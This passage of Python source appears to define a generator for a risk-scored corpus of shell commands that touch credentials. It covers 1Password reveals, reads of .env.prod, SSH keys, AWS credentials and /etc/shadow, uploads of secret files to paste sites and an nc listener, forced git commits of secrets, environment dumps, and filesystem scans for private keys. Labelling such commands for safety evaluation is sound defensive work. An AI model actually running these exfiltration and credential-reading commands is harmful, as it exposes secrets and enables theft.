    Family(
        name="op_read_only",
        category="onepassword",
        shell="bash",
        template="{prefix}{body} {scope} {args}",
        note="Read-only secret-store inspection",
        scopes=(Scope("account", "", 5, "nothing in the account is modified"),),
        group_by="variant",
        variants=(
            Variant("user_list", body="op user list"),
            Variant("group_list", body="op group list"),
            Variant("vault_list", body="op vault list"),
            Variant("item_list", body="op item list", args="--vault Production"),
            Variant("whoami", body="op whoami"),
        ),
    ),
    Family(
        name="op_item_write",
        category="onepassword",
        shell="bash",
        template="{prefix}{body} {scope} {args}",
        note="Inspection controls for the same secret-store item",
        scopes=(Scope("prod_item", '"Production Database"', 5, "the item is not modified"),),
        variants=(
            Variant("get_title", body="op item get", args="--fields title,updated_at"),
            Variant(
                "get_reveal",
                body="op item get",
                args="--reveal",
                shift=-1,
                note="the stored value is printed into the session log",
            ),
            Variant(
                "get_password_field",
                body="op item get",
                args="--fields password",
                shift=-1,
                note="the password field is printed, which is the whole secret",
            ),
        ),
    ),
    Family(
        name="secret_file_read",
        category="sensitive_files",
        shell="bash",
        template="{prefix}{body} {args} {scope}",
        note="Reading a file that can carry credentials",
        scopes=(
            Scope("env_example", ".env.example", 5, "a template of variable names with no values"),
            Scope("gitignore", ".gitignore", 5, "ignore rules, no secret material"),
            Scope("public_key", "~/.ssh/id_rsa.pub", 5, "the public half of a key pair"),
            Scope("env_local", ".env.local", 4, "developer-scoped values"),
            Scope("env", ".env", 4, "project credentials"),
            Scope("env_qa", ".env.qa", 4, "QA credentials"),
            Scope("env_staging", ".env.staging", 4, "staging credentials"),
            Scope("env_prod", ".env.prod", 3, "production credentials with a wider blast radius"),
            Scope("ssh_private", "~/.ssh/id_rsa", 3, "the private half of a key pair"),
            Scope("aws_credentials", "~/.aws/credentials", 3, "long-lived cloud keys"),
            Scope("kubeconfig", "~/.kube/config", 3, "cluster credentials and client certificates"),
            Scope("tfstate", "terraform.tfstate", 3, "infrastructure state, which embeds every provider secret"),
            Scope("gcp_key", "service-account.json", 3, "a cloud service account key"),
            Scope("shadow", "/etc/shadow", 4, "password hashes for every local account"),
            Scope("netrc", "~/.netrc", 4, "plaintext credentials for remote hosts"),
            Scope("docker_config", "~/.docker/config.json", 4, "registry credentials"),
            Scope("npmrc", ".npmrc", 4, "registry tokens"),
            Scope("git_credentials", "~/.git-credentials", 4, "plaintext forge tokens"),
            Scope("pgpass", "~/.pgpass", 4, "database passwords"),
            Scope("vault_token", "~/.vault-token", 3, "a live session token for the secret store"),
            Scope("pem_key", "server.key", 3, "a TLS private key"),
        ),
        variants=(
            Variant("cat", body="cat"),
            Variant("head", body="head -n 20"),
            Variant("grep_values", body="grep -i -e token -e password -e secret"),
            Variant("base64", body="base64"),
            Variant(
                "metadata_only",
                body="ls -l",
                shift=1,
                note="only the path, owner, and permissions are shown, not the contents",
            ),
        ),
    ),
    Family(
        name="secret_file_upload",
        category="sensitive_files",
        shell="bash",
        template="{prefix}{body}{scope} {args}",
        note="Sending a file that can carry credentials off the host",
        scopes=(
            Scope("env_prod", ".env.prod", 1, "production credentials leave the environment for good"),
            Scope("ssh_private", "~/.ssh/id_rsa", 1, "a private key that cannot be recalled once published"),
            Scope("env", ".env", 3, "project credentials are copied to another host"),
            Scope("tfstate", "terraform.tfstate", 3, "infrastructure state is copied to another host"),
            Scope("env_example", ".env.example", 5, "a template with no values is uploaded"),
            Scope("gitignore", ".gitignore", 5, "no secret material is uploaded"),
        ),
        variants=(
            Variant("curl_post", body="curl -X POST --data-binary @", args="https://paste.rs/9f2a"),
            Variant("curl_form", body="curl -F file=@", args="https://0x0.st"),
            Variant("scp", body="scp ", args="jump@10.0.0.7:/tmp/"),
            Variant("s3_public", body="aws s3 cp ", args="s3://customer-share/ --acl public-read"),
            Variant("gcs_bucket", body="gcloud storage cp ", args="gs://shared-exports/"),
            Variant("netcat", body="nc 203.0.113.9 9999 < ", args=""),
        ),
    ),
    Family(
        name="secret_file_commit",
        category="sensitive_files",
        shell="bash",
        template="{prefix}{body} {scope} {args}",
        note="Staging a file that can carry credentials for commit",
        scopes=(
            Scope("env_prod", ".env.prod", 2, "committed credentials have to be rotated and the history rewritten"),
            Scope("ssh_private", "~/.ssh/id_rsa", 2, "the private key would live in the repository history"),
            Scope("tfstate", "terraform.tfstate", 2, "the state file embeds provider secrets and remote state paths"),
            Scope("env", ".env", 3, "project credentials enter the history"),
            Scope("npmrc", ".npmrc", 3, "a registry token enters the history"),
            Scope("env_example", ".env.example", 5, "a template with no values is committed"),
        ),
        variants=(
            Variant("add", body="git add"),
            Variant(
                "force_add",
                body="git add -f",
                note="the ignore rule is bypassed, so the file is staged anyway",
            ),
            Variant(
                "diff_cached",
                body="git diff --cached",
                shift=1,
                note="the staged secret is printed into the terminal",
            ),
            Variant(
                "check_ignore",
                body="git check-ignore -v",
                shift=3,
                note="only the ignore rule is tested, nothing is staged",
            ),
        ),
    ),
    Family(
        name="secret_file_env_dump",
        category="sensitive_files",
        shell="bash",
        template="{prefix}{body} {args} {scope}",
        note="Printing process environment variables",
        scopes=(Scope("process", "", 4, "the credentials of the running process are printed"),),
        variants=(
            Variant("env", body="env | sort"),
            Variant("printenv", body="printenv"),
            Variant("own_environ", body="cat /proc/self/environ | tr '\\0' '\\n'"),
            Variant(
                "other_environ",
                body="sudo cat /proc/1/environ | tr '\\0' '\\n'",
                shift=-1,
                note="the environment of another process is read, not just this one",
            ),
            Variant("echo_secret", body="echo $AWS_SECRET_ACCESS_KEY"),
            Variant("history_grep", body="history | grep -i -e token -e secret -e password"),
            Variant("docker_env", body="docker inspect prod-api --format '{{.Config.Env}}'"),
            Variant(
                "kubectl_env",
                body="kubectl exec prod-api-0 -- env",
                shift=-1,
                note="the environment of a production pod is printed",
            ),
            Variant(
                "control_path",
                body="printenv PATH",
                shift=1,
                note="one variable that carries no secret",
            ),
        ),
    ),
    Family(
        name="secret_file_scan",
        category="sensitive_files",
        shell="bash",
        template="{prefix}{body} {scope} {args}",
        note="Scanning a tree for credential files",
        scopes=(
            Scope("repo", ".", 3, "the repository is searched for anything that looks like a credential"),
            Scope("home", "$HOME", 3, "the home directory is searched"),
            Scope("filesystem", "/", 2, "the whole filesystem is searched"),
        ),
        variants=(
            Variant("find_env", body="find", args="-name '.env*' -type f"),
            Variant("find_keys", body="find", args="-name 'id_*' -o -name '*.pem' -o -name '*.key'"),
            Variant("grep_private_key", body="grep -r -I -l -e 'BEGIN RSA PRIVATE KEY'"),
            Variant(
                "find_control",
                body="find",
                args="-name '.env.example'",
                shift=2,
                note="only a template is looked for",
            ),
        ),
    ),
    Family(
        name="secret_file_materialize",
        category="sensitive_files",
        shell="bash",
        template="{prefix}{body}{scope} {args}",
        note="Expanding a credential file into another artifact",
        scopes=(
            Scope("env_prod", ".env.prod", 3, "production credentials are written into a generated artifact"),
            Scope("env", ".env", 3, "project credentials are written into a generated artifact"),
            Scope("secret_yaml", "secrets.yaml", 3, "an encrypted secret file is decrypted into the terminal"),
            Scope("env_example", ".env.example", 5, "a template with no values is expanded"),
        ),
        variants=(
            Variant("envsubst", body="envsubst < "),
            Variant("docker_env_file", body="docker run --rm --env-file ", args="alpine env"),
            Variant("compose_config", body="docker compose --env-file ", args="config"),
            Variant(
                "kubectl_secret_yaml",
                body="kubectl create secret generic app-env --from-env-file=",
                args="-o yaml",
            ),
            Variant("ansible_vault_view", body="ansible-vault view "),
        ),
    ),
)


def generate(families: Sequence[Family] = FAMILIES) -> list[RiskRecord]:
    """Expand every family into records, in declaration order."""
    return [record for family in families for record in family.records()]


def write_corpus(path: Path | str, families: Sequence[Family] = FAMILIES) -> int:
    """Generate the corpus and write it as JSONL. Returns the row count."""
    return write_jsonl(path, generate(families))
